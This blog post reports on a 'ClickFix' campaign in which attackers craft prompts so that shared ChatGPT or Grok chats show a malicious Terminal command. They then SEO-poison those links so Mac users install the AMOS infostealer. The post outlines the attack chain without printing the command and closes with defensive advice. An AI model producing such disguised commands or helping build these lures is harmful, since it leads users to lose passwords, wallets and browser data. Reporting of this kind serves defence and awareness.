According to Dark Reading, a new “ClickFix” style attack is using SEO-poisoned links to real ChatGPT and Grok conversations to deliver infostealer malware. Huntress researchers Stuart Ashenbrenner and Jonathan Semon detailed the attack, which targeted a customer on December 5th. The victim searched for help cleaning a Mac hard drive, clicked a first-page Google result leading to a real ChatGPT or Grok chat, and followed instructions that secretly installed the AMOS stealer malware. The attack bypassed macOS protections with no malicious download or security warnings, relying entirely on the user copying and pasting a malicious terminal command. Semon believes this method could become a dominant initial access vector for malware over the next 6 to 18 months.
Why This Is So Sneaky
Here’s the thing: this attack doesn’t break any digital locks. It doesn’t exploit a software bug. It exploits trust. And that’s way harder to patch. Think about it. You Google a problem, you see a link to chat.openai.com or x.ai/grok—these are legitimate domains. You click, you’re on the real platform. The conversation looks like a normal troubleshooting session. Your guard is down because you didn’t click some sketchy .xyz link in a phishing email. You’re just trying to free up disk space!
But the command you’re told to paste into Terminal? It’s talking directly to an attacker’s server, downloading and executing the AMOS stealer. As the Huntress blog puts it, there’s “No malicious download. No security warnings.” Just a copy-paste into a “full-blown persistent data leak.” The malware then harvests everything: passwords, crypto wallets, browser data. It’s frighteningly elegant in its simplicity. It bypasses the human threat model by making the malicious action feel productive and safe.
The SEO Poisoning Engine
So how does a malicious ChatGPT chat end up on Google’s first page? The attacker engineers a prompt that looks like legitimate help but contains the bad command. They then use the platform’s “share” feature to create a public link to that conversation. Now they have a credible-looking URL on a trusted domain. Next, they spam that link across forums, content farms, and Telegram channels to artificially boost its search ranking for specific keywords—like “clean Mac hard drive.” This is classic SEO poisoning, but with a terrifyingly credible payload.
This is a breakthrough for criminals. Traditional phishing battles user instinct—a weird email feels off. But this? It feels like you’re using a tool to solve a problem. The attackers have basically found a way to weaponize our growing reliance on AI assistants. And as Huntress notes, this isn’t just a Mac problem. The same tactic would work flawlessly on Windows with a PowerShell command. The platform is irrelevant; the psychology is universal.
What Can You Actually Do?
Defending against this is tricky because it looks like normal activity. For IT and security teams, Huntress suggests monitoring for behavioral anomalies, like the `osascript` utility suddenly asking for credentials or hidden executables popping up in home directories. For everyone else, the advice is simple but hard: do not blindly execute terminal commands from any source you don’t absolutely trust. Not from an AI, not from a forum, not even from a blog (irony noted).
This is a stark reminder that AI outputs are not truth. They’re probabilistic text generation. Treating them as an authoritative source for system-level commands is a massive risk. Use strong, unique passwords and a password manager so a stealer gets less useful data. And maybe, just maybe, think twice next time you’re about to paste that convenient one-line fix into your terminal. Is it solving your problem, or creating a much bigger one? The scary part is, with this new ClickFix method, you probably won’t know until it’s too late.
